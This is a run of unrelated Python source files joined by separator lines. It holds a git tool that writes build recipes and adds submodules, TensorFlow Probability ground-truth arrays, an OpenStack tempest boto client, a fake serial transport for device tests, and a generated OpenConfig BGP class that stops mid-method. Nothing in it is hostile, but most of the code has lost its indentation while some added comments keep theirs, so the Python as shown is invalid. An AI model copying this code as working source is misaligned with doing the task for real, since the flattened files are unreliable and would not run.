def add_recipe(recipe_file, description, classes, url,
src_rev=None, priority=None):
if not os.path.exists(os.path.dirname(recipe_file)):
os.makedirs(os.path.dirname(recipe_file))
if os.path.exists(recipe_file):
logging.warning('recipe already exists: %s', recipe_file)
return
if url.startswith('git://'):
src_uri = url
elif '://' in url:
protocol, path = url.split('://', 1)
src_uri = 'git://%s;protocol=%s'%(path, protocol)
elif ':' in url:
src_uri = 'git://%s;protocol=ssh'%(url.replace(':', '/'))
elif url.startswith('/'):
src_uri = 'git://%s;protocol=file'%(url)
else:
src_uri = 'git://${TOPDIR}/%s;protocol=file'%(url)
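    # Illustrative examples of the URL -> SRC_URI mapping above (for reference):
    #   git://host/repo.git    -> git://host/repo.git
    #   https://host/repo.git  -> git://host/repo.git;protocol=https
    #   user@host:repo.git     -> git://user@host/repo.git;protocol=ssh
    #   /abs/path/repo         -> git:///abs/path/repo;protocol=file
    #   some/rel/path          -> git://${TOPDIR}/some/rel/path;protocol=file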
src_dir = os.path.basename(url.strip('/'))
if src_dir.endswith('.git'):
src_dir = src_dir[:-4]
with open(recipe_file, 'w') as recipe:
recipe.write("## %s\n"%(description))
recipe.write("\ninherit %s\n"%(' '.join(classes)))
recipe.write("\nSRC_URI = %r\n"%(src_uri))
if src_rev:
recipe.write("SRC_URI .= ';${SRC_REV}'\nSRC_REV = %r\n"%(src_rev))
recipe.write("S = '${SRC_DIR}/%s'\n"%(src_dir))
if priority:
recipe.write("\nPRIORITY = '%d'\n"%(priority))
cmd = ['git', 'add', recipe_file]
sts = subprocess.call(cmd)
if sts != 0:
logging.error("adding %s to index failed: %d", recipe_file, sts)
sys.exit(1)
def commit_recipes(args):
cmd = ['git', 'commit', '-m', "Add recipes for %s layer"%(args.layer)]
logging.info("Committing recipes to manifest")
sts = subprocess.call(cmd)
if sts != 0:
logging.error("committing recipes failed: %d", sts)
sys.exit(1)
def add_meta(args):
return
def add_submodule(args):
if os.path.exists(args.layer):
logging.error("layer directory already exists: %s", args.layer)
sys.exit(1)
cmd = ['git', 'diff', '--cached', '--shortstat']
staged_changes = subprocess.check_output(cmd)
if staged_changes:
logging.error("index is not clean: %s"%(staged_changes))
sys.exit(1)
cmd = ['git', 'status', '--porcelain']
unstaged_changes = {}
for line in subprocess.check_output(cmd).split('\n'):
if not line:
continue
assert line[2] == ' '
status = line[:2]
filename = line[3:]
if '->' in filename:
p = filename.split('->')
assert len(p) == 2
filename = p[0]
unstaged_changes[filename] = status
if '.gitmodules' in unstaged_changes:
logging.error(".gitmodules is changed")
sys.exit(1)
cmd = ['git', 'submodule', 'add']
if args.branch:
cmd += ['-b', args.branch]
cmd += ['--', args.url, args.layer]
logging.info("Cloning %s", args.url)
sts = subprocess.call(cmd)
if sts != 0:
logging.error("adding submodule failed: %d", sts)
sys.exit(1)
if args.branch and args.branch != 'master':
pushd(args.layer)
cmd = ['git', 'show-ref', '--verify', '--quiet', 'refs/heads/master']
sts = subprocess.call(cmd)
if sts == 0:
cmd = ['git', 'branch', '-d', 'master']
sts = subprocess.call(cmd)
if sts != 0:
logging.error("could not delete master branch: %d", sts)
sys.exit(1)
cmd = ['git', 'branch', '-M', args.branch, 'master']
sts = subprocess.call(cmd)
if sts != 0:
logging.error("could not rename %s branch: %d",
args.branch, sts)
sys.exit(1)
popd()
if args.commit:
pushd(args.layer)
cmd = ['git', 'reset', '--hard', args.commit]
sts = subprocess.call(cmd)
if sts != 0:
logging.error("reset to requested commit failed: %d", sts)
sys.exit(1)
popd()
cmd = ['git', 'add', args.layer]
sts = subprocess.call(cmd)
if sts != 0:
logging.error("adding %s to index failed: %d", args.layer, sts)
sys.exit(1)
with open('.gitmodules', 'r') as gitmodules_file:
gitmodules_lines = gitmodules_file.readlines()
assert args.url in gitmodules_lines[-1]
gitmodules_lines[-1] = "\turl = ./%s\n"%(args.layer)
with open('.gitmodules', 'w') as gitmodules_file:
gitmodules_file.write(''.join(gitmodules_lines))
cmd = ['git', 'add', '.gitmodules']
sts = subprocess.call(cmd)
if sts != 0:
logging.error("adding .gitmodules to index failed: %d", sts)
sys.exit(1)
cmd = ['git', 'commit', '-m', "Add layer %s from %s"%(args.layer, args.url)]
logging.info("Committing new layer to manifest")
sts = subprocess.call(cmd)
if sts != 0:
logging.error("committing new layer failed: %d", sts)
sys.exit(1)
|
|
# Lint as: python3
# Copyright 2020 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
r"""Ground truth values for `synthetic_log_gaussian_cox_process`.
Automatically generated using the command:
```
python -m inference_gym.tools.get_ground_truth \
--target \
synthetic_log_gaussian_cox_process \
--stan_samples \
50000 \
```
"""
import numpy as np
IDENTITY_AMPLITUDE_MEAN = np.array([
0.32072022433999997,
]).reshape(())
IDENTITY_AMPLITUDE_MEAN_STANDARD_ERROR = np.array([
3.0940358102820867e-05,
]).reshape(())
IDENTITY_AMPLITUDE_STANDARD_DEVIATION = np.array([
0.02559753029515912,
]).reshape(())
IDENTITY_LENGTH_SCALE_MEAN = np.array([
0.20118323845504,
]).reshape(())
IDENTITY_LENGTH_SCALE_MEAN_STANDARD_ERROR = np.array([
0.00013817309709052925,
]).reshape(())
IDENTITY_LENGTH_SCALE_STANDARD_DEVIATION = np.array([
0.10701400857692753,
]).reshape(())
IDENTITY_LOG_INTENSITY_MEAN = np.array([
4.20288236326,
4.709207094080001,
4.62233113842,
4.944547228639999,
4.28999354994,
4.39554439676,
4.518892563640001,
4.15161704376,
4.74945860724,
4.427181770020001,
4.6141229693,
4.6048662583599995,
4.75778922404,
4.4900421474600005,
4.5865291818400005,
4.79564131308,
4.508236103019999,
4.304835396380001,
4.416794986,
4.095037292120001,
4.97264671832,
4.17825554262,
4.21719904902,
4.37156110816,
4.59551701196,
4.7252760272600005,
4.84813004802,
4.854912794400001,
4.406343230859999,
5.24489042876,
4.870945183839999,
4.548702735040001,
4.36177244338,
4.17766253032,
4.52816158328,
4.733318624499999,
5.052602071400001,
4.8258750821,
4.700472078440001,
3.990449227399999,
4.7337001052800005,
4.40447427638,
3.9581792201,
5.0218719962,
4.395250676120001,
4.03439999154,
4.3266505539399995,
4.22946238568,
4.034910857519999,
4.36182705406,
4.587829210680001,
4.90518674516,
4.31571661928,
4.3955445199000005,
4.1079588327200005,
5.03507415382,
4.51065169096,
4.49872020478,
4.78889924052,
4.78861489722,
4.59516177668,
4.99802586672,
4.8116544040800004,
4.49050597756,
4.339599036339999,
3.62890155888,
5.0161057071599995,
4.63141923614,
4.2147211353600005,
4.4487148675,
4.489757085519999,
4.97223816018,
4.6920652575599995,
4.278970918920001,
4.7486786793,
4.78899014594,
5.2041679068199995,
4.70833082244,
4.59541683122,
4.811339776559999,
4.4886272641,
4.45720560652,
4.39471775008,
4.71724139846,
4.42751357322,
4.426985393039999,
4.86267490034,
4.16349831328,
4.61321866986,
5.00495364782,
4.4160133517,
4.79712528414,
4.95237454752,
4.885064734559999,
4.519466438299999,
4.37278476326,
4.43848836884,
4.42695140016,
4.4588055957599995,
3.8917194078999997,
]).reshape((100,))
IDENTITY_LOG_INTENSITY_MEAN_STANDARD_ERROR = np.array([
0.00011831364250478179,
9.483775963372658e-05,
9.652919947341661e-05,
8.337013132959046e-05,
0.00011561150079562063,
0.00010717200253882,
0.00010195651375929193,
0.0001205320162422976,
9.386113705433946e-05,
0.00010746117708222189,
9.513196647113554e-05,
9.788679458194594e-05,
9.103376529463737e-05,
0.00010326510138619498,
9.88966852466385e-05,
8.934004537603784e-05,
0.00010153466095540698,
0.00011341184864361979,
0.00010964415651397516,
0.00012587233046143937,
8.054612940151116e-05,
0.0001208952340420302,
0.0001167726254864137,
0.00010886175264306444,
9.966251370592176e-05,
9.151975387587098e-05,
9.11956813155465e-05,
8.806158192058707e-05,
0.0001057966044679052,
7.386607667819403e-05,
8.640334021239735e-05,
9.980389268038452e-05,
0.00010900152016520581,
0.00012343182503907617,
9.896409275657552e-05,
9.129585475941647e-05,
7.822357383232112e-05,
8.941742746090295e-05,
9.276422819334156e-05,
0.0001332885026143371,
9.263219392419513e-05,
0.00010691121303398835,
0.00013319378601692032,
8.031622848606638e-05,
0.00010740888527632254,
0.00012556127772572596,
0.00011235739234055746,
0.00011724283689932499,
0.0001300209041111566,
0.00011035356273550638,
9.844139421649398e-05,
8.529565585944775e-05,
0.00011258795208146118,
0.0001077154245672818,
0.00012255879993124653,
7.963432932840548e-05,
0.00010345149824671217,
0.00010385286473644432,
9.106901844911758e-05,
8.926194698822457e-05,
9.844120678172515e-05,
8.239412733449509e-05,
8.939632403832393e-05,
0.00010380326937392531,
0.00011017393772468167,
0.00015799222533737308,
8.272167433462777e-05,
9.599838779390758e-05,
0.00011808183708636825,
0.00010519763126357752,
0.00010133537536627358,
8.332110715962807e-05,
9.404357584089731e-05,
0.00011398511817799267,
9.07019907244635e-05,
9.053044756076378e-05,
7.431092146436388e-05,
9.272301371240938e-05,
9.824480996540542e-05,
9.036681535652437e-05,
0.00010342078115627951,
0.00010477490079315446,
0.00010682360235771559,
9.329299448876983e-05,
0.00010669140211541223,
0.00010695049618959563,
8.676052428007136e-05,
0.00011979704035683832,
9.957144628501618e-05,
8.420341544476581e-05,
0.00010810136390363441,
8.969483132833031e-05,
8.463437664544033e-05,
8.8071991099268e-05,
0.00010166929387824244,
0.00010817066970815699,
0.00010797349137559893,
0.00010705462630278869,
0.00010644985890669317,
0.0001362107992741312,
]).reshape((100,))
IDENTITY_LOG_INTENSITY_STANDARD_DEVIATION = np.array([
0.11424020705270559,
0.09085377890926327,
0.0947706123941995,
0.08171440426832924,
0.11048535317460287,
0.10488557130753746,
0.09910884038099467,
0.1166271845518286,
0.08954562428893467,
0.1033020945375956,
0.09513698036249041,
0.09545651031461784,
0.0889270832918099,
0.100728391015481,
0.09617227100946373,
0.08775279822730153,
0.09997957787232623,
0.10942354192370314,
0.10425421432893842,
0.12045558357279951,
0.0805327613228001,
0.11612425419280477,
0.11346143626108722,
0.10605810277632668,
0.09598254820482044,
0.09007783983873462,
0.08565835411958048,
0.08525677970349559,
0.10440050505275222,
0.07104242874714885,
0.08437716225945378,
0.09796366895178162,
0.10668161094802979,
0.11550337261218158,
0.09869983807191436,
0.09009157169921114,
0.0774758040246272,
0.08640887715868421,
0.09128935905028154,
0.12576266606540681,
0.09000810503263651,
0.10460385742479912,
0.12751640666016478,
0.0787373617100347,
0.10478715461791699,
0.12328303235109847,
0.10824888714818304,
0.11278854995824572,
0.123028417098343,
0.10625643957760271,
0.09617433994566642,
0.08301524961248957,
0.10868153064048662,
0.10480672163920438,
0.11927463999899772,
0.07817361179600364,
0.09948059241956109,
0.09983189096232159,
0.08771703093072358,
0.08801831245676447,
0.09550957350676731,
0.079605667256235,
0.0870772291434278,
0.10040190863606638,
0.10751864015761466,
0.1483202197391365,
0.07894990560715888,
0.09412742169667297,
0.11385550450939112,
0.10243752435117108,
0.10043828859229889,
0.0805492885380644,
0.09163621755849682,
0.11044100338114146,
0.08949303963019738,
0.08742857162093777,
0.07224612516024854,
0.09105574660435421,
0.09578126932155098,
0.08692790820696102,
0.10047043025126168,
0.10207485577579226,
0.10468509923494321,
0.0905762209706072,
0.10331366001794706,
0.10290507393831791,
0.0848145019712843,
0.116371337143016,
0.095036183094068,
0.07945625086263128,
0.10388664326396169,
0.08727670168391258,
0.0813069994143018,
0.08392577614306619,
0.09922177289150036,
0.10603680577138772,
0.10277141438928934,
0.10364978592149432,
0.10202619870199639,
0.13152269243637876,
]).reshape((100,))
|
|
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ConfigParser
import contextlib
import types
import urlparse
from tempest import config
from tempest import exceptions
import boto
import boto.ec2
import boto.s3.connection
CONF = config.CONF
class BotoClientBase(object):
ALLOWED_METHODS = set()
def __init__(self, username=None, password=None,
auth_url=None, tenant_name=None,
*args, **kwargs):
self.connection_timeout = str(CONF.boto.http_socket_timeout)
self.num_retries = str(CONF.boto.num_retries)
self.build_timeout = CONF.boto.build_timeout
self.ks_cred = {"username": username,
"password": password,
"auth_url": auth_url,
"tenant_name": tenant_name}
def _keystone_aws_get(self):
import keystoneclient.v2_0.client
keystone = keystoneclient.v2_0.client.Client(**self.ks_cred)
ec2_cred_list = keystone.ec2.list(keystone.auth_user_id)
ec2_cred = None
for cred in ec2_cred_list:
if cred.tenant_id == keystone.auth_tenant_id:
ec2_cred = cred
break
else:
ec2_cred = keystone.ec2.create(keystone.auth_user_id,
keystone.auth_tenant_id)
if not all((ec2_cred, ec2_cred.access, ec2_cred.secret)):
raise exceptions.NotFound("Unable to get access and secret keys")
return ec2_cred
def _config_boto_timeout(self, timeout, retries):
try:
boto.config.add_section("Boto")
except ConfigParser.DuplicateSectionError:
pass
boto.config.set("Boto", "http_socket_timeout", timeout)
boto.config.set("Boto", "num_retries", retries)
def __getattr__(self, name):
"""Automatically creates methods for the allowed methods set."""
if name in self.ALLOWED_METHODS:
def func(self, *args, **kwargs):
with contextlib.closing(self.get_connection()) as conn:
return getattr(conn, name)(*args, **kwargs)
func.__name__ = name
setattr(self, name, types.MethodType(func, self, self.__class__))
setattr(self.__class__, name,
types.MethodType(func, None, self.__class__))
return getattr(self, name)
else:
raise AttributeError(name)
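    # Illustrative use of the method proxying above (hypothetical credentials):
    #
    #   ec2 = APIClientEC2(username='demo', password='secret',
    #                      auth_url='http://127.0.0.1:5000/v2.0',
    #                      tenant_name='demo')
    #   keypairs = ec2.get_all_key_pairs()  # opens a connection, proxies the call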
def get_connection(self):
self._config_boto_timeout(self.connection_timeout, self.num_retries)
if not all((self.connection_data["aws_access_key_id"],
self.connection_data["aws_secret_access_key"])):
if all(self.ks_cred.itervalues()):
ec2_cred = self._keystone_aws_get()
self.connection_data["aws_access_key_id"] = \
ec2_cred.access
self.connection_data["aws_secret_access_key"] = \
ec2_cred.secret
else:
raise exceptions.InvalidConfiguration(
"Unable to get access and secret keys")
return self.connect_method(**self.connection_data)
class APIClientEC2(BotoClientBase):
def connect_method(self, *args, **kwargs):
return boto.connect_ec2(*args, **kwargs)
def __init__(self, *args, **kwargs):
super(APIClientEC2, self).__init__(*args, **kwargs)
aws_access = CONF.boto.aws_access
aws_secret = CONF.boto.aws_secret
purl = urlparse.urlparse(CONF.boto.ec2_url)
region_name = CONF.compute.region
if not region_name:
region_name = CONF.identity.region
region = boto.ec2.regioninfo.RegionInfo(name=region_name,
endpoint=purl.hostname)
port = purl.port
if port is None:
if purl.scheme is not "https":
port = 80
else:
port = 443
else:
port = int(port)
self.connection_data = {"aws_access_key_id": aws_access,
"aws_secret_access_key": aws_secret,
"is_secure": purl.scheme == "https",
"region": region,
"host": purl.hostname,
"port": port,
"path": purl.path}
ALLOWED_METHODS = set(('create_key_pair', 'get_key_pair',
'delete_key_pair', 'import_key_pair',
'get_all_key_pairs',
'get_all_tags',
'create_image', 'get_image',
'register_image', 'deregister_image',
'get_all_images', 'get_image_attribute',
'modify_image_attribute', 'reset_image_attribute',
'get_all_kernels',
'create_volume', 'delete_volume',
'get_all_volume_status', 'get_all_volumes',
                           'get_volume_attribute', 'modify_volume_attribute',
                           'bundle_instance', 'cancel_spot_instance_requests',
                           'confirm_product_instance',
'get_all_instance_status', 'get_all_instances',
'get_all_reserved_instances',
'get_all_spot_instance_requests',
'get_instance_attribute', 'monitor_instance',
'monitor_instances', 'unmonitor_instance',
'unmonitor_instances',
'purchase_reserved_instance_offering',
'reboot_instances', 'request_spot_instances',
'reset_instance_attribute', 'run_instances',
'start_instances', 'stop_instances',
'terminate_instances',
'attach_network_interface', 'attach_volume',
'detach_network_interface', 'detach_volume',
'get_console_output',
'delete_network_interface', 'create_subnet',
'create_network_interface', 'delete_subnet',
'get_all_network_interfaces',
'allocate_address', 'associate_address',
'disassociate_address', 'get_all_addresses',
'release_address',
'create_snapshot', 'delete_snapshot',
'get_all_snapshots', 'get_snapshot_attribute',
'modify_snapshot_attribute',
'reset_snapshot_attribute', 'trim_snapshots',
'get_all_regions', 'get_all_zones',
'get_all_security_groups', 'create_security_group',
'delete_security_group', 'authorize_security_group',
'authorize_security_group_egress',
'revoke_security_group',
'revoke_security_group_egress'))
def get_good_zone(self):
"""
:rtype: BaseString
:return: Returns with the first available zone name
"""
for zone in self.get_all_zones():
# NOTE(afazekas): zone.region_name was None
if (zone.state == "available" and
zone.region.name == self.connection_data["region"].name):
return zone.name
else:
raise IndexError("Don't have a good zone")
class ObjectClientS3(BotoClientBase):
def connect_method(self, *args, **kwargs):
return boto.connect_s3(*args, **kwargs)
def __init__(self, *args, **kwargs):
super(ObjectClientS3, self).__init__(*args, **kwargs)
aws_access = CONF.boto.aws_access
aws_secret = CONF.boto.aws_secret
purl = urlparse.urlparse(CONF.boto.s3_url)
port = purl.port
if port is None:
if purl.scheme is not "https":
port = 80
else:
port = 443
else:
port = int(port)
self.connection_data = {"aws_access_key_id": aws_access,
"aws_secret_access_key": aws_secret,
"is_secure": purl.scheme == "https",
"host": purl.hostname,
"port": port,
"calling_format": boto.s3.connection.
OrdinaryCallingFormat()}
ALLOWED_METHODS = set(('create_bucket', 'delete_bucket', 'generate_url',
'get_all_buckets', 'get_bucket', 'delete_key',
'lookup'))
|
|
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Fake transport for testing Switchboard."""
import copy
import time
from gazoo_device.switchboard import switchboard_process
from gazoo_device.switchboard import transport_properties
from gazoo_device.utility import multiprocessing_utils
EXCEPTION_MESSAGE = "Something bad happened during read"
def _produce_data(byte_rate, bytes_per_second, exit_flag,
generate_raw_log_lines, read_queue):
"""Generates dummy data to imitate reading from a device."""
byte_count = 0
delay = 0.0
line_count = 0
padding = 0
start_time = time.time()
while not exit_flag.is_set():
line_count += 1
if callable(generate_raw_log_lines):
raw_log_line = u"{}{}\n".format(generate_raw_log_lines(), "*" * padding)
else:
raw_log_line = u"{:08d}{}\n".format(line_count, "*" * padding)
byte_count += len(raw_log_line)
bytes_per_second.value = byte_count / (time.time() - start_time)
if bytes_per_second.value > byte_rate:
delay += 0.001
elif bytes_per_second.value < byte_rate:
if delay > 0.0:
delay -= 0.001
else:
padding += 1
time.sleep(delay)
read_queue.put(raw_log_line)
class FakeTransport:
"""Mock Switchboard transport class for testing."""
def __init__(self,
baudrate=115200,
generate_lines=False,
generate_raw_log_lines=None,
fail_open=False,
fail_read=False,
failure_message=EXCEPTION_MESSAGE,
write_read_func=None,
open_on_start=True,
read_only_if_raw_data_queue_enabled=False):
self.comms_address = "/some/serial/path"
self.bytes_per_second = multiprocessing_utils.get_context().Value("f", 0.0)
self.is_open_count = multiprocessing_utils.get_context().Value("i", 0)
self.open_count = multiprocessing_utils.get_context().Value("i", 0)
self.close_count = multiprocessing_utils.get_context().Value("i", 0)
self.read_size = multiprocessing_utils.get_context().Value("i", 0)
self.reads = multiprocessing_utils.get_context().Queue()
self.writes = multiprocessing_utils.get_context().Queue()
self._baudrate = baudrate
self._exit_flag = multiprocessing_utils.get_context().Event()
self._fail_open = fail_open
self._fail_read = fail_read
self._generate_lines = generate_lines
self._generate_raw_log_lines = generate_raw_log_lines
self._properties = {}
self._failure_message = failure_message
self._transport_open = multiprocessing_utils.get_context().Event()
self._write_read_func = write_read_func
self._properties[transport_properties.OPEN_ON_START] = open_on_start
# Note: if using read_only_if_raw_data_queue_enabled flag, your test must
# call bind_raw_data_enabled_method().
self._read_only_if_raw_data_queue_enabled = read_only_if_raw_data_queue_enabled
self._raw_data_queue_enabled_method = None
def __del__(self):
self.close()
def clear_open(self):
if hasattr(self, "_transport_open"):
self._transport_open.clear()
def close(self):
"""Releases resources used by the class."""
try:
if hasattr(self, "_exit_flag"):
self._exit_flag.set()
if hasattr(self, "_generator"):
self._generator.join()
if hasattr(self, "close_count"):
self.close_count.value += 1
if hasattr(self, "_transport_open"):
self.clear_open()
except IOError:
# Test probably failed and canceled the manager Event objects
pass
finally:
# Always manually delete any multiprocess manager attributes so python's
# garbage collector properly runs.
attrs = [
"_raw_data_queue_enabled_method", "bytes_per_second", "is_open_count",
"open_count", "close_count", "read_size", "reads", "writes",
"_properties", "_transport_open"
]
for attr in attrs:
if hasattr(self, attr):
delattr(self, attr)
# Always make "_exit_flag" last attribute to delete
if hasattr(self, "_exit_flag"):
delattr(self, "_exit_flag")
def bind_raw_data_enabled_method(self, transport_process):
"""Add a reference to raw_data_enabled() method of transport_process.
Args:
transport_process (TransportProcess): the transport process using
this fake transport. Required in order to be able to read only
when the raw data queue is enabled to avoid race conditions.
"""
self._raw_data_queue_enabled_method = transport_process.raw_data_enabled
def is_open(self):
result = False
try:
if hasattr(self, "is_open_count"):
self.is_open_count.value += 1
result = self._transport_open.is_set()
except IOError:
# Test probably failed and canceled the manager Event objects
pass
return result
def get_all_properties(self):
return copy.deepcopy(self._properties)
def get_property(self, key, value=None):
if hasattr(self, "_properties"):
if key in self._properties:
return self._properties[key]
return value
def get_property_list(self):
return list(self._properties.keys())
def set_property(self, key, value):
self._properties[key] = value
def open(self):
try:
self.open_count.value += 1
self.set_open()
except IOError:
# Test probably failed and canceled the manager Event objects
pass
if self._fail_open:
raise Exception(self._failure_message)
def set_open(self):
self._transport_open.set()
if self._generate_lines:
self._generator = multiprocessing_utils.get_context().Process(
target=_produce_data,
args=(self._baudrate / 10, self.bytes_per_second, self._exit_flag,
self._generate_raw_log_lines, self.reads))
self._generator.daemon = True  # daemonize the generator process before starting it
self._generator.start()
def _should_read(self):
return (not self._read_only_if_raw_data_queue_enabled or
        (self._raw_data_queue_enabled_method is not None and
         self._raw_data_queue_enabled_method()))
def read(self, size=1, timeout=None):
"""Reads from mock read queue or raises an error if fail_read is True."""
try:
self.read_size.value = size
except IOError:
# Test probably failed and canceled the manager Event objects
pass
if self._fail_read:
raise Exception(self._failure_message)
if self._should_read():
return switchboard_process.get_message(self.reads, timeout=timeout)
else:
return None
def write(self, data, timeout=None):
self.writes.put(data, timeout=timeout)
if self._write_read_func:
responses = self._write_read_func(data)
for response in responses:
self.reads.put(response)
def test_method(self, raise_error: bool = False) -> str:
"""A transport method which raises an error if raise_error=True."""
del self # Unused by the mock implementation
if raise_error:
raise RuntimeError("Something failed.")
return "Some return"
|
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improvement)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/bgp/global/afi-safis/afi-safi/ipv6-unicast/prefix-limit/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: State information relating to the prefix-limit for the
AFI-SAFI
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__max_prefixes",
"__prevent_teardown",
"__shutdown_threshold_pct",
"__restart_timer",
)
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__max_prefixes = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="max-prefixes",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
self.__prevent_teardown = YANGDynClass(
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="prevent-teardown",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
self.__shutdown_threshold_pct = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..100"]},
),
is_leaf=True,
yang_name="shutdown-threshold-pct",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-types:percentage",
is_config=False,
)
self.__restart_timer = YANGDynClass(
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="restart-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"bgp",
"global",
"afi-safis",
"afi-safi",
"ipv6-unicast",
"prefix-limit",
"state",
]
def _get_max_prefixes(self):
"""
Getter method for max_prefixes, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/max_prefixes (uint32)
YANG Description: Maximum number of prefixes that will be accepted
from the neighbour
"""
return self.__max_prefixes
def _set_max_prefixes(self, v, load=False):
"""
Setter method for max_prefixes, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/max_prefixes (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_max_prefixes is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_max_prefixes() directly.
YANG Description: Maximum number of prefixes that will be accepted
from the neighbour
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="max-prefixes",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """max_prefixes must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="max-prefixes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=False)""",
}
)
self.__max_prefixes = t
if hasattr(self, "_set"):
self._set()
def _unset_max_prefixes(self):
self.__max_prefixes = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="max-prefixes",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
def _get_prevent_teardown(self):
"""
Getter method for prevent_teardown, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/prevent_teardown (boolean)
YANG Description: Do not tear down the BGP session when the maximum
prefix limit is exceeded, but rather only log a
warning. The default of this leaf is false, such
that when it is not specified, the session is torn
down.
"""
return self.__prevent_teardown
def _set_prevent_teardown(self, v, load=False):
"""
Setter method for prevent_teardown, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/prevent_teardown (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_prevent_teardown is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_prevent_teardown() directly.
YANG Description: Do not tear down the BGP session when the maximum
prefix limit is exceeded, but rather only log a
warning. The default of this leaf is false, such
that when it is not specified, the session is torn
down.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
